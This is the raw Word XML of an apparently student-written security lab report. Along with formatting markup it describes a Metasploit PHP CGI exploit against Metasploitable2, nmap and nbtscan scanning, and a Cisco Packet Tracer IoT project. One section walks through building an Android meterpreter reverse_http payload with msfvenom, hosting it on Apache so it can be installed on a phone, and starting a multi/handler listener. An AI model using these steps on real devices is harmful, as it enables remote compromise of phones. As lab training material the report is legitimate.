    <w:p w14:paraId="60204CEB" w14:textId="77777777" w:rsidR="00727F0C" w:rsidRDefault="004A4454" w:rsidP="00654C64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604B854" wp14:editId="0F9CE7BD">
            <wp:extent cx="5731510" cy="2755265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1193243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6C23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3B02F4F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63BD73C6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444BAFE0" w14:textId="77777777" w:rsidR="00244EB6" w:rsidRDefault="00244EB6" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164E5369" w14:textId="760F4EB7" w:rsidR="00BA4D50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6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26600192" w14:textId="6F37017E" w:rsidR="00727F0C" w:rsidRPr="00727F0C" w:rsidRDefault="00727F0C" w:rsidP="00654C6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search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.4.2. From there we ge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HP CGI argument injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use it. Then we look onto the options and s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RHOST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9B29F7" w14:textId="3E37867F" w:rsidR="00727F0C" w:rsidRDefault="00727F0C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24F3DB9" wp14:editId="516FBC67">
            <wp:extent cx="5731510" cy="2044568"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20965696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/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="20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937F" w14:textId="4368512B" w:rsidR="00727F0C" w:rsidRDefault="00727F0C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B441742" wp14:editId="4A2B1E20">
            <wp:extent cx="5730041" cy="1829688"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="8448144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9" b="14557"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="18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F50" w14:textId="77777777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3411343" w14:textId="058ADEEB" w:rsidR="00654C64" w:rsidRPr="00244EB6" w:rsidRDefault="00727F0C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7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E47D0" w14:textId="21C16D64" w:rsidR="008955CF" w:rsidRPr="008955CF" w:rsidRDefault="008955CF" w:rsidP="00654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run the command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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we get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r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and this is how we exploit metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00097CB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2 machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> using http.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF11B6" w14:textId="6DC0B618" w:rsidR="00727F0C" w:rsidRDefault="008955CF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22CEE46" wp14:editId="789C178B">
            <wp:extent cx="2688879" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9148998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78204" r="52892"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2690963" cy="6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AE1B" w14:textId="1B17CB9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1FEF1738" w14:textId="179F04C5" w:rsidR="00654C64" w:rsidRDefault="00654C64" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A86B1D6" w14:textId="2C614865" w:rsidR="008955CF" w:rsidRDefault="008955CF" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7CC826" w14:textId="21A2B4D0" w:rsidR="008955CF" w:rsidRPr="00244EB6" w:rsidRDefault="008955CF" w:rsidP="00654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5. Perform Network scanning using following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commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2FACFE" w14:textId="77777777" w:rsidR="008955CF" w:rsidRPr="00244EB6" w:rsidRDefault="008955CF" w:rsidP="008955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STEP 1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814A222" w14:textId="3961275B" w:rsidR="008955CF" w:rsidRPr="00EA33BC" w:rsidRDefault="008955CF" w:rsidP="008955CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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First we open the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terminal box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and access the root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sudo su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And then we should get to know the ip address of our kali linux by the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA33BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ifconfig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. Later </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA33BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">we scan the available </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA33BC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EA33BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> networks available by the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA33BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nbtscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA33BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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A33B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B0DEA27" w14:textId="2E129BC2" w:rsidR="008955CF" w:rsidRDefault="008955CF" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AEE371F" wp14:editId="3FC56B57">
            <wp:extent cx="2254313" cy="2218099"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="265520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3452" r="60585" b="15999"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2254531" cy="22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48CE" w14:textId="3C19F04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p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38178D50" w14:textId="77777777" w:rsidR="008955CF" w:rsidRDefault="008955CF" w:rsidP="008955CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="770"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A23AD42" w14:textId="3638B229" w:rsidR="008955CF" w:rsidRPr="008955CF" w:rsidRDefault="008955CF" w:rsidP="008955CF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EB3CE62" wp14:editId="43ABF091">
            <wp:extent cx="1964602" cy="606582"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="13046693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7" r="65721" b="67947"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1964677" cy="6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51FF" w14:textId="3A168D64" w:rsidR="008955CF" w:rsidRDefault="008955CF" w:rsidP="008955CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3B0AD3" w14:textId="18B9E397" w:rsidR="008955CF" w:rsidRPr="00244EB6" w:rsidRDefault="008955CF" w:rsidP="00895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sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B420CF1" w14:textId="77777777" w:rsidR="008955CF" w:rsidRDefault="008955CF" w:rsidP="008955CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="770"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5CCBEF" w14:textId="58DEED4A" w:rsidR="008955CF" w:rsidRPr="008955CF" w:rsidRDefault="008955CF" w:rsidP="008955CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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F3359C9" wp14:editId="46D0F1F4">
            <wp:extent cx="3146079" cy="1729212"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="5338022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31560" r="45024" b="5644"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3146383" cy="17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4B1A" w14:textId="4CC8BBC7" w:rsidR="00F860EF" w:rsidRDefault="00F860E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BD89B35" w14:textId="4FC718E5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2412DE76" w14:textId="2E6E9C2E" w:rsidR="008955CF" w:rsidRPr="00244EB6" w:rsidRDefault="008955CF" w:rsidP="008955C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sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="531ACEB8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646A66E0" w14:textId="3641D773" w:rsidR="008955CF" w:rsidRDefault="008955CF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76ACDBA" wp14:editId="1A8A3725">
            <wp:extent cx="3186820" cy="2756790"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="58705326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2" r="67223" b="14199"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3216313" cy="27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9C6D" w14:textId="495D1BA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F9F996" w14:textId="1A2A4388" w:rsidR="002E272C" w:rsidRPr="00244EB6" w:rsidRDefault="002E272C" w:rsidP="002E272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O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4408AF7E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626D6523" w14:textId="12EDB36A" w:rsidR="002E272C" w:rsidRP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AC598FF" wp14:editId="7496CBDF">
            <wp:extent cx="3652513" cy="2602871"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6985"/>
            <wp:docPr id="16000706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9" r="52448" b="12217"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3668738" cy="26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7F9B" w14:textId="7028830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A4DA9E3" w14:textId="511A831A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1246400" w14:textId="77777777" w:rsid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5D36AA15" w14:textId="7E07622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-A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17258F43" w14:textId="77777777" w:rsidR="002E272C" w:rsidRDefault="002E272C" w:rsidP="002E272C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:ind w:left="770"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226C55CD" w14:textId="0D628218" w:rsidR="002E272C" w:rsidRPr="002E272C" w:rsidRDefault="002E272C" w:rsidP="002E272C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5D912E3" wp14:editId="4B2BD40C">
            <wp:extent cx="3971484" cy="2892582"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="6150062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4605" b="875"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3974251" cy="28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EBD9" w14:textId="4F23C4A7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19D79EC1" w14:textId="17B9C192" w:rsidR="002E272C" w:rsidRDefault="002E272C" w:rsidP="008955CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:ind w:left="770"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C43C119" wp14:editId="48453D79">
            <wp:extent cx="3934600" cy="2928796"/>
            <wp:effectExtent l="0" t="0" r="8890" b="5080"/>
            <wp:docPr id="12560893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82"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3946658" cy="29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E32F" w14:textId="6FD37801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0767CE82" w14:textId="346A029B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6E5C08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61F2C2AF" w14:textId="6B72A181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A1F2E44" wp14:editId="41DC63A3">
            <wp:extent cx="3783604" cy="2747727"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="19244870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6" b="197"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3784770" cy="2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C734" w14:textId="5DA8DAC0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</w:p>
    <w:p w14:paraId="4CB307A9" w14:textId="77777777" w:rsidR="002E272C" w:rsidRDefault="002E272C" w:rsidP="008955CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:ind w:left="770"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31DCCED1" w14:textId="0B39B1A5" w:rsidR="002E272C" w:rsidRDefault="002E272C" w:rsidP="008955CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:ind w:left="77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F100B52" wp14:editId="61D15AF2">
            <wp:extent cx="2552013" cy="633428"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="162440794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55455" b="72550"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2553077" cy="6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2EE" w14:textId="4D279C9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3AE7C29" w14:textId="73AAD804" w:rsidR="002E272C" w:rsidRPr="00244EB6" w:rsidRDefault="002E272C" w:rsidP="002E272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map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–Pt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B482B25" w14:textId="77777777" w:rsidR="002E272C" w:rsidRDefault="002E272C" w:rsidP="002E272C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2E188C" w14:textId="0AABEBC8" w:rsidR="002E272C" w:rsidRDefault="002E272C" w:rsidP="002E272C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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76B710C" wp14:editId="4CAC5F2C">
            <wp:extent cx="2335794" cy="2033905"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
            <wp:docPr id="20095668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26135" r="59082"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2336184" cy="20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F271" w14:textId="46B4A602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B51855A" w14:textId="21759361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6A3C73B" w14:textId="441EF7DA" w:rsidR="002E272C" w:rsidRDefault="002E272C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2FA5D27" w14:textId="2E7A1052" w:rsidR="002E272C" w:rsidRPr="00244EB6" w:rsidRDefault="002E272C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6. Networking project on Fire extinguisher using cisco packet tracer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0E612" w14:textId="16470D1F" w:rsidR="002E272C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52DA6D2C" w14:textId="209B1CBC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, we ope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Cisco Packet Tracer Software</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then in the file we choose the components as shown below and connect it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7E713F" w14:textId="0C511B87" w:rsidR="001E6B80" w:rsidRDefault="00615734" w:rsidP="002E272C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93C122C" wp14:editId="187F082B">
            <wp:extent cx="4848131" cy="2727006"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121595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34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9866" cy="27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3DD" w14:textId="0E0AC35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4DF481A6" w14:textId="146D3F98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To connect it wireless, click on the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 xml:space="preserve">, go for the wireless option and select SSID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Gateway1</w:t>
      </w:r>
      <w:r w:rsidRPr="003013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1096987E" w14:textId="50B040FB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4B9BBAC" wp14:editId="246A61D0">
            <wp:extent cx="4789283" cy="2693906"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18648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2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6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AFE" w14:textId="1073A01F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3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED26CF9" w14:textId="148E53F9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013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Now open the siren, click advance and go to I/O configuration </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>and  change</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> network adapter as wireless i.e.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PT-IOT-NM-1W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o to configuration and then  select interface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Wireless0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then gateway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DHCP</w:t>
      </w:r>
      <w:r w:rsidR="00097CB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS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Automatic</w:t>
      </w:r>
      <w:r w:rsidRPr="003013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and IoT server as </w:t>
      </w:r>
      <w:r w:rsidRPr="00097CB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Home Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="003013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. Repeat same steps for the other components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E03169" w14:textId="52EDDF1C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A95220C" wp14:editId="65BCF3DC">
            <wp:extent cx="4336610" cy="2439283"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="82508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7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6096" cy="24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C50" w14:textId="0E363564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4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AB0569" w14:textId="7693437E" w:rsidR="003013E9" w:rsidRPr="003013E9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want to check the IoT monitor in the smartphone. We see all the components and they are in off condition. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E548F" w14:textId="29928723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5572353" wp14:editId="51F6ACAA">
            <wp:extent cx="4608214" cy="2592057"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="33024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63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4278" cy="25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2AE" w14:textId="13A73643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0D9754B" w14:textId="017586A2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BA93CD" w14:textId="0A912426" w:rsidR="00436723" w:rsidRPr="00244EB6" w:rsidRDefault="00436723" w:rsidP="002E272C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5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D248484" w14:textId="5135F8C4" w:rsidR="003013E9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 xml:space="preserve">From there we click on the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B52C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>condition  and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B52C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can give actions of the on and off of the home appliances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E001B33" w14:textId="4B0F8F7E" w:rsidR="00436723" w:rsidRDefault="00615734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F00BEB9" wp14:editId="5C327A9A">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="72855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47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846" w14:textId="17964E8C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32F1B0E" w14:textId="70DD269A" w:rsidR="00EC5CC6" w:rsidRPr="00B52C16" w:rsidRDefault="003013E9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B52C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see the output in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B52C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B52C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in the git file along with this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1ECC6A" w14:textId="77777777" w:rsidR="003013E9" w:rsidRDefault="003013E9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EB5897A" w14:textId="15732E21" w:rsidR="00EC5CC6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EBD5744" w14:textId="40C9C8A5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8234A9E" w14:textId="1CF25FB9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94F0B42" w14:textId="086FAEA8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3F8C280A" w14:textId="7EE8ECA2" w:rsidR="00B52C16" w:rsidRDefault="00B52C1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C0CCA1B" w14:textId="67B1958A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G</w:t>
      </w:r>
      <w:r w:rsidR="007523A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ROUP 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00244EB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8CAFD5C" w14:textId="5899DA36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1.Perform malware attack using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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2155222F" w14:textId="6F45C533" w:rsidR="00B52C16" w:rsidRPr="00244EB6" w:rsidRDefault="00B52C16" w:rsidP="00B52C16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1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764A4EF4" w14:textId="5425FADB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r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access the root by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 Then we enter the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 We will be attack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ndroid device so our next command will be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sfvenom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-p android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00097CB4" w:rsidRPr="00EA5507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terpreter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reverse_http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= LPORT=443 R &gt;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</w:p>
    <w:p w14:paraId="4B17CF82" w14:textId="1D9576C6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n the next command is copying the file in the html site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cp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/var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA55D6" w14:textId="551C91E0" w:rsidR="00B52C16" w:rsidRDefault="00B52C16" w:rsidP="00B52C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that we star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pache2 serv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ED7D83" w14:textId="77777777" w:rsidR="00B52C16" w:rsidRDefault="00B52C16" w:rsidP="00B52C16">
      <w:pPr>
        <w:spacing w:before="24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After this we will go to the websit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ip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address of kali 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linux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”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attack.ap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we will download the file and install it in your android device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD8DC6B" w14:textId="77777777" w:rsidR="008072B3" w:rsidRDefault="00B52C16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ACC260" wp14:editId="6C5706AC">
            <wp:extent cx="4268080" cy="2656781"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15471032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" t="3791" r="25759" b="13787"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4268711" cy="26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F4E9" w14:textId="2ADA9526" w:rsidR="008072B3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FD69404" wp14:editId="30A85679">
            <wp:extent cx="1883884" cy="4083113"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13997461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61" cy="41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14:paraId="36A6EB51" w14:textId="492C64CA" w:rsidR="00B52C16" w:rsidRPr="008072B3" w:rsidRDefault="008072B3" w:rsidP="008072B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8072B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we can see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008072B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>MainActivity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008072B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> app installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47237EC3" w14:textId="62DF907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>STEP 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD1A775" w14:textId="1E071BC0" w:rsidR="00EC5CC6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we enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>msfcons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Then we run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exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
